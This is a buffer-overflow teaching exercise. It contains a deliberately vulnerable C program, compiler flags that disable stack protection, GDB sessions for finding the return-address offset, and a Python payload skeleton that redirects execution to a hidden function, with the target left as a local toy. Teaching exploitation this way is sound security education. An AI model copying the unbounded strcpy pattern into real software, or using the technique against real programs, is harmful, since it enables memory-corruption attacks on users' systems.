Secret Function

Here is a simple C program that takes an argument and prints its hexadecimal value to the console. Our goal is to trigger and exploit a buffer overflow.

#include <stdint.h>
#include <stdio.h>
#include <string.h>

static void print_hex_u4(uint8_t n) {
    char c;

    n &= 0x0f; // Truncate to 4 bits to be sure.
    c = n < 0x0a
        ? '0' + n
        : 'a' + (n - 0x0a);
    putchar(c);
}

static void print_hex_u8(uint8_t n) {
    print_hex_u4(n >> 4); // Print the 4 most significant bits.
    print_hex_u4(n); // Print the 4 least significant bits.
}

static void print_hex(uint8_t* data) {
    uint8_t data_copy[10];
    uint8_t* data_cursor;

    strcpy((char*)data_copy, (char*)data);
    data_cursor = &data_copy[0];
    while (*data_cursor != '\0') {
        print_hex_u8(*data_cursor);
        data_cursor++;
    }
    putchar('\n');
}

static void secret(void) {
    // This function is never called, isn't it?
    puts("What? How did you get here?!");
}

int main(int argc, char** argv) {
    if (argc != 2) {
        puts("Please, provide one argument.");
        return -1;
    }
    print_hex((uint8_t*)argv[1]);
    return 0;
}

For educational purposes, and to make our task easier, we’ll need to invoke gcc with special arguments. Copy the source code into a C file (“tp2.c” for instance), then run:

$ gcc -g -m32 -fno-stack-protector tp2.c -o tp2

“What?”, or “Why?”, you may ask.

Well, -g means “compile with debug symbols”, -m32 means “compile as a 32-bit program instead of a 64-bit one”, and -fno-stack-protector means “trust me, I don’t need stack security”.

The reason is that modern CPUs and OSes have multiple defenses against memory vulnerabilities. To learn about buffer overflows, we deactivate them; otherwise, the learning curve would be way too harsh. But worry not, we’ll talk about that later on.

If everything went smoothly, you should see a “tp2” program next to the “tp2.c” source code. Try to run it:

$ ./tp2 "Hello"
48656c6c6f

It is indeed a hex dump of the ASCII string “Hello”:

$ echo -n "Hello" | hexdump -C
00000000  48 65 6c 6c 6f                                    |Hello|
00000005
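The nibble-by-nibble logic of print_hex_u4 and print_hex_u8 can also be mirrored in a few lines of Python, which is handy for checking outputs later on. This is only a sketch: the function names hex_u4, hex_u8 and hex_dump are ours and are not part of tp2.c.

```python
def hex_u4(n: int) -> str:
    """Return the hex digit for the 4 least significant bits of n."""
    n &= 0x0F  # Truncate to 4 bits, as print_hex_u4 does.
    if n < 0x0A:
        return chr(ord("0") + n)
    return chr(ord("a") + (n - 0x0A))


def hex_u8(n: int) -> str:
    """Return two hex digits: high nibble first, then low nibble."""
    return hex_u4(n >> 4) + hex_u4(n)


def hex_dump(data: bytes) -> str:
    """Concatenate the hex digits of every byte in data."""
    return "".join(hex_u8(byte) for byte in data)


print(hex_dump(b"Hello"))  # prints 48656c6c6f
```

The result matches both the output of ./tp2 "Hello" and Python's built-in b"Hello".hex().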

Where is the Bug?

First, inspect the code and try to figure out where we could trigger a buffer overflow.

Tip

Click to get a hint.

Don’t know where to look? A buffer overflow needs, well, a buffer. 😉

Crash It

Now that you have identified the issue, try to run the program in a way that crashes it. If you see a segmentation fault, you win.

Run the Secret Function

You have probably noticed by now that there’s a function called secret that’s never called. It is nevertheless compiled and linked into the program. By exploiting the buffer overflow, we can jump to it. Let’s do just that!

It’s time to spin up GDB:

$ gdb ./tp2
GNU gdb (GDB) 17.1
Copyright (C) 2025 Free Software Foundation, Inc.
  ...
Reading symbols from ./tp2...
(gdb) run "Hello"
Starting program: /home/pierre/tp2 "Hello"
  ...
48656c6c6f
[Inferior 1 (process 38074) exited normally]
(gdb) info address secret
Symbol "secret" is a function at address 0x5655628d.

See the last line? That’s the function address we’re targeting.

Warning

The address may be different on your machine! It could vary based on your OS/distribution, GCC’s version, architecture, etc.

Tip

Click to get a first hint.

We’re trying to overwrite the return address of print_hex with the address of secret by injecting data at the correct place. Thus, we need to know where the return address lands in relation to data_copy. There are two approaches.

First Approach One simple (and fun) way to do it is to just throw something at the program and see what happens:

$ gdb ./tp2
  ...
(gdb) run AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJMMMMNNNN
Starting program: /home/pierre/tp2 AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJMMMMNNNN
  ...
41414141424242424343bcd6ffff444445454545464646464747474748484848494949494a4a4a4a4d4d4d4d4e4e4e4e

Program received signal SIGSEGV, Segmentation fault.
0x48484747 in ?? ()
(gdb) print $eip
$1 = (void (*)()) 0x48484747

⇒ The last line is useful… Remember that x86 is little-endian.

Second Approach Another way to do it, if we have access to debugging symbols, is to ask GDB:

$ gdb ./tp2
  ...
(gdb) break print_hex
Breakpoint 1 at 0x123d: file tp2.c, line 24.
(gdb) run abcd
Starting program: /home/pierre/tp2 abcd
  ...
Breakpoint 1, print_hex (data=0xffffd9ba "abcd") at tp2.c:24
24	    strcpy((char*)data_copy, (char*)data);
(gdb) info frame
Stack level 0, frame at 0xffffd700:
 eip = 0x5655623d in print_hex (tp2.c:24); saved eip = 0x56556305
 called by frame at 0xffffd730
 source language c.
 Arglist at 0xffffd6f8, args: data=0xffffd9ba "abcd"
 Locals at 0xffffd6f8, Previous frame's sp is 0xffffd700
 Saved registers:
  ebx at 0xffffd6f4, ebp at 0xffffd6f8, eip at 0xffffd6fc
(gdb) print &data_copy
$2 = (uint8_t (*)[10]) 0xffffd6e2

⇒ Try to identify useful information in the logs above…

Tip

Click to get a second hint.

Depending on the approach you used in the previous hint, you can compute the number of bytes you must input to overwrite the return address. Here’s how:

First Approach The EIP register holds the address of the instruction we’re currently executing. Notice its value, 0x48484747. x86 is a little-endian architecture, meaning we injected four bytes, 0x47 0x47 0x48 0x48, in that order, into the return address. Then, when leaving the function, these bytes were loaded into EIP and we jumped to an invalid address, triggering a segmentation fault.

⇒ How do these bytes relate to the data we threw? What is 0x47 or 0x48 in ASCII? And how can this help us now?

Second Approach Look closely: info frame told us that the saved EIP is stored at 0xffffd6fc, which is the location of the return address we want to modify; print &data_copy told us that the data_copy buffer starts at 0xffffd6e2.

⇒ The question is, how many bytes should we write into data_copy before we reach the return address?

Tip

Click to get a third hint.

Still stuck? Here’s one last piece of advice:

First Approach Notice that, in ASCII, 0x47 is G and 0x48 is H. So the little-endian 32-bit integer 0x48484747 corresponds to the string “GGHH” in memory. We must inject something like AAAABBBBCCCCDDDDEEEEFFFFGG<secret-address>.
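The same reasoning can be checked mechanically. The sketch below assumes the exact pattern and EIP value from the GDB session shown earlier; the variable names are ours. It converts the crashed EIP back to its in-memory byte order and looks for those bytes in the pattern.

```python
# Pattern passed to the program in the GDB session.
pattern = b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJMMMMNNNN"

# Value GDB printed for $eip after the crash.
crashed_eip = 0x48484747

# x86 is little-endian: the least significant byte comes first in memory.
eip_bytes = crashed_eip.to_bytes(4, "little")

# Position of those bytes in the pattern = padding needed before the address.
offset = pattern.index(eip_bytes)

print(eip_bytes, offset)  # prints b'GGHH' 26
```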

Second Approach Just subtract the two addresses: 0xffffd6fc - 0xffffd6e2 = 26. We must inject something like <26-bytes><secret-address>.

Whichever approach you took, you now have to write a working payload, in a file for instance. Once you have it, inject it using bash:
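If hexadecimal arithmetic is not your thing, Python can do the subtraction. The two addresses below are the ones from the GDB session shown earlier and will likely differ on your machine; the variable names are ours.

```python
# Where the return address is saved ("eip at ..." in the info frame output).
saved_eip_address = 0xFFFFD6FC

# Where the buffer starts (output of print &data_copy).
data_copy_address = 0xFFFFD6E2

# Number of bytes to write before reaching the return address.
offset = saved_eip_address - data_copy_address

print(offset, hex(offset))  # prints 26 0x1a
```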

$ setarch -R ./tp2 "$(cat payload.bin)"

The setarch -R part is important: it disables Address Space Layout Randomization (ASLR), so addresses stay the same from one run to the next.

Tip

Click to get a fourth hint.

Using Python is an easy and familiar way to generate our payload:

secret_address = bytes.fromhex("?")  # What do you put here?
with open("payload.bin", "wb") as file:
    file.write(b"A" * 26 + secret_address)
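A variant of this script can pack the address from an integer and guard against one common pitfall. This is a sketch under assumptions: build_payload is a helper name of ours, and 0x11223344 is a made-up address used only to show the byte order, not the address of secret. The NUL check is there because strcpy stops copying at the first zero byte, so a payload containing one would be cut short.

```python
import struct

OFFSET = 26  # Bytes between data_copy and the saved return address.


def build_payload(target_address: int, offset: int = OFFSET) -> bytes:
    """Return padding followed by the address as 4 little-endian bytes."""
    address_bytes = struct.pack("<I", target_address)  # "<I": little-endian u32
    payload = b"A" * offset + address_bytes
    if b"\x00" in payload:
        # strcpy would stop at the NUL byte and truncate the payload.
        raise ValueError("payload contains a NUL byte")
    return payload


# Hypothetical address, for illustration only.
example = build_payload(0x11223344)
print(example[-4:].hex())  # prints 44332211
```

Note how the four address bytes end up reversed in the payload compared to the way the address is written.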